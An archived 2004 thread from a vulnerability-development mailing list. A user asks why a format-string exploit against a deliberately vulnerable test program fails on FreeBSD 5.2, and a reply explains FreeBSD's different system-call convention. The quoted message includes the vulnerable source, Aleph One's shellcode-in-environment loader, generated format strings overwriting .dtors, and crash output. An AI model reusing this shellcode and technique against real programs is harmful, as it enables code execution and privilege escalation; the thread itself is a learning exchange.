Vulnerability Development mailing list archives
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT
From: infamous41md () hotpop com
Date: Fri, 30 Jul 2004 19:47:14 -0400
i didn't look at your shellcode, but if you're using generic aleph code it won't work on freebsd. freebsd makes system calls differently than on linux, it doesn't put args in registers, it pushes them onto the stack. if you're trying to learn how to write exploits, then when the thing dumps core, you should probably look at the core dump. it will tell you where it dumped core, and you can look at dtors address to verify that you actually overwrote correct location w/ correct value. On Thu, 29 Jul 2004 17:02:50 +0900 Ganbold <ganbold () micom mng net> wrote:
Hi all, I have sample format string exploit problem in FreeBSD 5.2-CURRENT. $uname -an FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3 11:09:58 ULAT 2004 tsgan@localhost:/usr/obj/usr/src/sys/MX i386 I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the format string. I can get the offset: --------------------------------------------------------------------- ------------------------------------ bash-2.05b$ ./fmt_vuln "AAAA %x %x %x %x %x %x" The right way: AAAA %x %x %x %x %x %x The wrong way: AAAA bfbfdfb8 0 0 0 0 41414141 [*] test_val @ 0x0804977c = -72 0xffffffb8 --------------------------------------------------------------------- ------------------------------------ Then I'm getting DTORs address: --------------------------------------------------------------------- ------------------------------------ bash-2.05b$ objdump -s -j .dtors fmt_vuln fmt_vuln: file format elf32-i386-freebsd Contents of section .dtors: 8049824 ffffffff 00000000 ........ bash-2.05b$ nm ./fmt_vuln|grep DTOR 08049828 d __DTOR_END__ 08049824 d __DTOR_LIST__ --------------------------------------------------------------------- ------------------------------------ Afterwards I'm storing shellcode in env using AlephOne's exploit code (See below). --------------------------------------------------------------------- ------------------------------------$ ./getsx1 200 Using address: 0xbfbfec78 bash-2.05b$ bash-2.05b$ ./getenvaddr EGG EGG is located at 0xbfbfe557 --------------------------------------------------------------------- ------------------------------------ When I run exploit I get: --------------------------------------------------------------------- ------------------------------------ bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049828 -r 0xbfbfe557 -o 6 -b 0` Format string builder version 0.2(C) 2001 Pappy & Zorgon [ Building the fmt string ... ] [ Building completed (52) ] [ Checking the fmt string ... ] [ Checking completed (52) ] [ fmt string ] = %327x%6$n%398x%7$n%218x%8$n%256x%9$n The right way: %327x%6$n%398x%7$n%218x%8$n%256x%9$n The wrong way: Bus error (core dumped) bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049824 -r 0xbfbfe557 -o 6 -b 0` Format string builder version 0.2 (C) 2001 Pappy & Zorgon [ Building the fmt string ... ] [ Building completed (52) ] [ Checking the fmt string ... ] Found a % at 4. [ Checking completed (52) ] [ fmt string ] = %%327x%6$n%398x%7$n%218x%8$n%256x%9$n The right way: %%327x%6$n%398x%7$n%218x%8$n%256x%9$n The wrong way: Bus error (core dumped) --------------------------------------------------------------------- ------------------------------------ So I get Bus error (core dumped) result. But in my opinion I should get shell. Somehow exploit is not working and I don't know the reason. I tried many times and no result. It seems like format string exploit in FreeBSD is different than Linux. Does anybody have experience developing format string exploit in FreeBSD before? Did somebody solve this kind of problem before? Can somebody give me some hints, advices and guides? I googled for this kind of problem, and find only in this list last June someone had problem, but didn't find the solution. Can somebody help me in this regard? thanks in advance, Ganbold Followings are vulnerable program, getenvaddr.c, Aleph One exploit: --------------------------------------------------------------------- ------------------------------------ Vulnerable program: --------------------------------------------------------------------- ------------------------------------ #include <stdlib.h> int main(int argc, char *argv[]) { char text[1024]; static int test_val = -72; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[0]); exit(0); } strcpy(text, argv[1]); printf("The right way:\n"); printf("%s", text); printf("\nThe wrong way:\n"); printf(text); printf("\n"); // Debug output printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val); exit(0); } --------------------------------------------------------------------- ------------------------------------ Aleph One's exploit code --------------------------------------------------------------------- ------------------------------------ #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp, %ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe2" /* movl %esp, %edx */ "\x50" /* pushl %eax */ "\x52" /* pushl %edx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x3b" /* movb $0x3b, %al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax, %eax */ "\x40" /* inc %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\xcd\x80"; /* int $0x80 */ unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/usr/local/bin/bash"); } --------------------------------------------------------------------- ------------------------------------ getenvaddr.c --------------------------------------------------------------------- ------------------------------------ #include <stdlib.h> int main(int argc, char *argv[]) { char *addr; if(argc < 2) { printf("Usage:\n%s <environment variable name>\n", argv[0]); exit(0); } addr = getenv(argv[1]); if(addr == NULL) printf("The environment variable %s doesn't exist.\n", argv[1]); else printf("%s is located at %p\n", argv[1], addr); return 0; }
-- -sean
Current thread:
- Problem with format string exploit dev in FreeBSD 5.2-CURRENT Ganbold (Jul 30)
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT infamous41md (Jul 31)
- <Possible follow-ups>
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT Vlad902 (Jul 30)